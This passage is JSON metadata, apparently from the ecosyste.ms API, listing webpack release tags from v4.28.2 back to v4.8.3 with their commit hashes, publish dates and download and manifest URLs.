itories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4